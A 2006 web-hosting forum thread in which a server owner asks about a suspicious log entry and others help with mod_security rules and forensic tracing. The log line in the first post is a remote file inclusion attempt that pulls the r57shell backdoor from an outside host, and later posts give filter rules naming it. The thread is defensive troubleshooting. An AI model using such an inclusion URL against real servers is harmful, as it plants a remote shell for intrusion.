The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Anyone know what this actually does?

Discussion in 'General Discussion' started by noimad1, Apr 14, 2006.

  1. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    Does anyone know if this would actually do anything:


    www.mydomain.com/randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt

    I mean would that actually download any files to my server or anything like that?

    I keep getting files in my tmp directory, but I can't find out where they are comming from. I've upgraded all software I am using, and removed any old versions like phpbb2 and such....


    This is the only strange one I see in my log?
     
  2. logix1000

    logix1000 Active Member

    Joined:
    Dec 12, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    Have you secured your /tmp partition ?
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Use mod_security.

    Add:

    SecFilter "LOCAL_PATH"
    SecFilter "r57shell\.txt"

    Commom backdoor shell, securing tmp wont help, it can be easily run from perl.
     
  4. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    I am running mod security, so I will add those SecFilters. I'm still kind of new to the mod-security so I wasn't sure exactly how that worked. But if it is that easy to add the filters that is easy enough....

    I'll give it a try.

    Thanks,
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I suggest checking out my mod security configuration, I've written alot of the rules myself, from scouring error logs, dom logs, recent exploits, etc, it's always updated.

    I've also added rules based upon your attack

    http://www.hostmerit.com/modsec.user.conf

    Please let me know if you have any other questions :D
     
  6. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16

    Thank you very much. I've added the SecFilters and then tried that URL and it said permission denied, so I think that is good.

    Now we will see if that is what they were using to get the files in the tmp directory...
     
  7. randomuser2

    randomuser2 Member

    Joined:
    Dec 23, 2005
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    1
    You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

    Next time/if it happens, run "stat" on the file(s) -- ie: stat /tmp/whatever.txt

    and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perserverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
     
  8. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    Thank you very much for the information. I will monitor the tmp directory and see if it happens again. I was still concerned about having an insecure script out there. This domain is using so many it is hard to find. Mabye doing what you said can help me track it down...
     
  9. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16

    Ok, I got another one. So what logs exactly would you go through first?
     
  10. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Try

    grep "filename.txt" /usr/local/apache/domlogs/*

    Quick and dirty but might help.

    Also, ps -u nobody, look for anything anything except httpd, and possibly melange/chats running, things like perl, psybnc, etc etc.

    Then take the process ID (pid) and cd /proc/(pid)

    Then cat environ look for PWD (directory) or OLDPWD(last dir), also while in this dir ls -al, search for shortcuts back to the users directory, or where it sprouted from.
     
Loading...

Share This Page